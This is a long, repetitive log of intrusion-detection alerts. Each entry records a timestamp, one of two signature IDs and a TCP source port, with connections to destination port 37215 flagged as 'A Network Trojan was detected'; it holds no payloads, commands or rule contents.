          Timestamp:06/09/24-16:33:16.930050
          SID:2829579
          Source Port:45350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000737
          SID:2829579
          Source Port:53396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290140
          SID:2835222
          Source Port:55572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.308877
          SID:2829579
          Source Port:58038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719080
          SID:2835222
          Source Port:60570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034907
          SID:2835222
          Source Port:54908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890485
          SID:2829579
          Source Port:58654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603788
          SID:2829579
          Source Port:60328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397286
          SID:2835222
          Source Port:39322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082278
          SID:2835222
          Source Port:49372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396718
          SID:2829579
          Source Port:46194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910544
          SID:2835222
          Source Port:36188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286950
          SID:2829579
          Source Port:33134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282477
          SID:2835222
          Source Port:60346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718768
          SID:2835222
          Source Port:44444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165953
          SID:2835222
          Source Port:35480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643312
          SID:2835222
          Source Port:52030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869398
          SID:2829579
          Source Port:35438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714112
          SID:2835222
          Source Port:49798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398956
          SID:2835222
          Source Port:46432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273698
          SID:2835222
          Source Port:41862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.399057
          SID:2829579
          Source Port:40048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719520
          SID:2835222
          Source Port:41066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398494
          SID:2829579
          Source Port:42904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944624
          SID:2829579
          Source Port:56264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917135
          SID:2835222
          Source Port:60760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414276
          SID:2829579
          Source Port:39072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644341
          SID:2835222
          Source Port:40838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993267
          SID:2829579
          Source Port:41172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085518
          SID:2829579
          Source Port:50948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245050
          SID:2835222
          Source Port:44686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465106
          SID:2835222
          Source Port:54656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986482
          SID:2829579
          Source Port:33964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605975
          SID:2835222
          Source Port:33054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032023
          SID:2835222
          Source Port:45082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222594
          SID:2829579
          Source Port:35460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157770
          SID:2835222
          Source Port:42708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868867
          SID:2835222
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822049
          SID:2829579
          Source Port:53822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035909
          SID:2829579
          Source Port:38174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820996
          SID:2829579
          Source Port:60900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079396
          SID:2835222
          Source Port:44992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168710
          SID:2829579
          Source Port:37674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076373
          SID:2835222
          Source Port:48616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.301257
          SID:2829579
          Source Port:35426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604609
          SID:2835222
          Source Port:46226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990880
          SID:2835222
          Source Port:52504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029692
          SID:2835222
          Source Port:46606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.951973
          SID:2829579
          Source Port:54140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867938
          SID:2829579
          Source Port:54318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.270028
          SID:2835222
          Source Port:40538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035229
          SID:2835222
          Source Port:51854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230040
          SID:2829579
          Source Port:48696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.091172
          SID:2835222
          Source Port:46852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597394
          SID:2829579
          Source Port:58882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286547
          SID:2829579
          Source Port:32956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398448
          SID:2835222
          Source Port:44892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559789
          SID:2829579
          Source Port:60522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286738
          SID:2835222
          Source Port:41846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159674
          SID:2835222
          Source Port:34534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915792
          SID:2835222
          Source Port:56610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306145
          SID:2829579
          Source Port:39098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720984
          SID:2835222
          Source Port:36210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034024
          SID:2829579
          Source Port:51378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033845
          SID:2829579
          Source Port:55834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.636084
          SID:2835222
          Source Port:41722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399989
          SID:2835222
          Source Port:58578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920220
          SID:2829579
          Source Port:57732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037243
          SID:2835222
          Source Port:36096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286373
          SID:2829579
          Source Port:44344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285994
          SID:2835222
          Source Port:58070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944300
          SID:2835222
          Source Port:38362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133195
          SID:2829579
          Source Port:58434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291749
          SID:2829579
          Source Port:46714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296409
          SID:2829579
          Source Port:45574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035744
          SID:2835222
          Source Port:55890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.560479
          SID:2835222
          Source Port:40254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916032
          SID:2835222
          Source Port:40376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034804
          SID:2835222
          Source Port:44050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208062
          SID:2829579
          Source Port:42954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.906013
          SID:2835222
          Source Port:40236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.208922
          SID:2829579
          Source Port:42520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714334
          SID:2835222
          Source Port:42522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080228
          SID:2835222
          Source Port:53168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.870787
          SID:2829579
          Source Port:49162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468874
          SID:2835222
          Source Port:47844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646239
          SID:2835222
          Source Port:42500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566053
          SID:2829579
          Source Port:53426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249333
          SID:2829579
          Source Port:46228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948029
          SID:2835222
          Source Port:49548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104042
          SID:2829579
          Source Port:33592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400121
          SID:2835222
          Source Port:34368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.946763
          SID:2829579
          Source Port:51158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715087
          SID:2829579
          Source Port:57622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292290
          SID:2835222
          Source Port:32948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081843
          SID:2835222
          Source Port:41234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714777
          SID:2835222
          Source Port:39384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285726
          SID:2835222
          Source Port:36026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414666
          SID:2829579
          Source Port:53564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718357
          SID:2835222
          Source Port:59102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717822
          SID:2829579
          Source Port:55508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.167341
          SID:2829579
          Source Port:53528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994711
          SID:2835222
          Source Port:53728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643966
          SID:2835222
          Source Port:42088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225789
          SID:2829579
          Source Port:55098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132956
          SID:2829579
          Source Port:52922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930277
          SID:2835222
          Source Port:46932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541516
          SID:2835222
          Source Port:50030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.242587
          SID:2829579
          Source Port:52748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822523
          SID:2835222
          Source Port:60864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275781
          SID:2829579
          Source Port:33566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133709
          SID:2835222
          Source Port:36944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294571
          SID:2835222
          Source Port:60806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566473
          SID:2829579
          Source Port:44670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159541
          SID:2835222
          Source Port:58896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645982
          SID:2835222
          Source Port:36000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897642
          SID:2835222
          Source Port:43170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719635
          SID:2835222
          Source Port:59502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719503
          SID:2835222
          Source Port:36082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.895718
          SID:2829579
          Source Port:49408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558381
          SID:2835222
          Source Port:33920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471824
          SID:2829579
          Source Port:59720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014966
          SID:2835222
          Source Port:54542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476814
          SID:2835222
          Source Port:58018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.003661
          SID:2829579
          Source Port:47824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163253
          SID:2829579
          Source Port:43054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034538
          SID:2829579
          Source Port:33022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948432
          SID:2829579
          Source Port:50826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948632
          SID:2829579
          Source Port:41736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818604
          SID:2829579
          Source Port:33550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398853
          SID:2835222
          Source Port:55750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917922
          SID:2829579
          Source Port:52876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599525
          SID:2829579
          Source Port:55536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.469466
          SID:2829579
          Source Port:36092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247236
          SID:2835222
          Source Port:57470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.914839
          SID:2829579
          Source Port:44618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160308
          SID:2835222
          Source Port:35994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414396
          SID:2835222
          Source Port:56512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721078
          SID:2835222
          Source Port:32934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.553844
          SID:2829579
          Source Port:42748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862584
          SID:2829579
          Source Port:44460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892633
          SID:2829579
          Source Port:50940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538486
          SID:2829579
          Source Port:59188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718774
          SID:2829579
          Source Port:36890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396191
          SID:2829579
          Source Port:53606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415509
          SID:2829579
          Source Port:34198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.148151
          SID:2835222
          Source Port:39340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165637
          SID:2829579
          Source Port:50208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224102
          SID:2835222
          Source Port:41068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947005
          SID:2829579
          Source Port:43530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564203
          SID:2829579
          Source Port:53082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031598
          SID:2829579
          Source Port:60956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418980
          SID:2829579
          Source Port:53206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905906
          SID:2829579
          Source Port:49320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988660
          SID:2835222
          Source Port:39800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.992295
          SID:2835222
          Source Port:55514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168031
          SID:2829579
          Source Port:51112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012591
          SID:2835222
          Source Port:40352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162431
          SID:2829579
          Source Port:56314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819000
          SID:2835222
          Source Port:45198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247620
          SID:2829579
          Source Port:48450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.553806
          SID:2829579
          Source Port:54286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925971
          SID:2829579
          Source Port:59326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.247448
          SID:2829579
          Source Port:43682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601788
          SID:2835222
          Source Port:35864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267443
          SID:2829579
          Source Port:33112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397210
          SID:2835222
          Source Port:34022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.474271
          SID:2835222
          Source Port:34338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165431
          SID:2835222
          Source Port:60498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397925
          SID:2829579
          Source Port:49540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917004
          SID:2835222
          Source Port:53728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869348
          SID:2829579
          Source Port:48120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923270
          SID:2829579
          Source Port:35148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988434
          SID:2829579
          Source Port:42200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566189
          SID:2835222
          Source Port:54690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914431
          SID:2835222
          Source Port:38790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032919
          SID:2829579
          Source Port:60234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989518
          SID:2829579
          Source Port:33026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252609
          SID:2829579
          Source Port:60242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014409
          SID:2829579
          Source Port:37588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250493
          SID:2835222
          Source Port:38938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949772
          SID:2835222
          Source Port:58470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603112
          SID:2829579
          Source Port:55490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868980
          SID:2829579
          Source Port:39364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538452
          SID:2835222
          Source Port:45828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.090060
          SID:2835222
          Source Port:50134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288159
          SID:2829579
          Source Port:58104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081183
          SID:2829579
          Source Port:53172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205767
          SID:2835222
          Source Port:57278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166815
          SID:2835222
          Source Port:60754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866118
          SID:2829579
          Source Port:47302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397622
          SID:2829579
          Source Port:57562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946820
          SID:2829579
          Source Port:52048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822193
          SID:2835222
          Source Port:42100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248106
          SID:2829579
          Source Port:53438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274921
          SID:2829579
          Source Port:53696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.294030
          SID:2835222
          Source Port:51882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397705
